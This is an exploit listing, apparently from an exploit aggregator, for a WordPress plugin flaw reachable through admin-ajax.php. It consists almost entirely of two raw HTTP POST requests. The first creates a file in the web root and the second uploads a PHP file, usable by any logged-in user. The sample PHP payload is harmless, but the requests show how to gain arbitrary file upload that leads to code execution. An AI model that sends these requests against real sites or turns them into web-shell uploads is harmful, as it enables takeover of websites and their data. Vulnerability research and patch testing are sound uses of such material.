Share
## https://sploitus.com/exploit?id=WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E
Create an empty file to /aa.txt:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: [any authenticated user]

action=connector&cmd=mkfile&name=aa.txt&target=l1_Lw

Upload a PHP file to /hello.php:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583
Content-Length: 597
Connection: close
Cookie: [any authenticated user]

-----------------------------14077557643203747161684872583
Content-Disposition: form-data; name="cmd"

upload
-----------------------------14077557643203747161684872583
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------14077557643203747161684872583
Content-Disposition: form-data; name="action"

connector
-----------------------------14077557643203747161684872583
Content-Disposition: form-data; name="upload[]"; filename="hello.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------14077557643203747161684872583--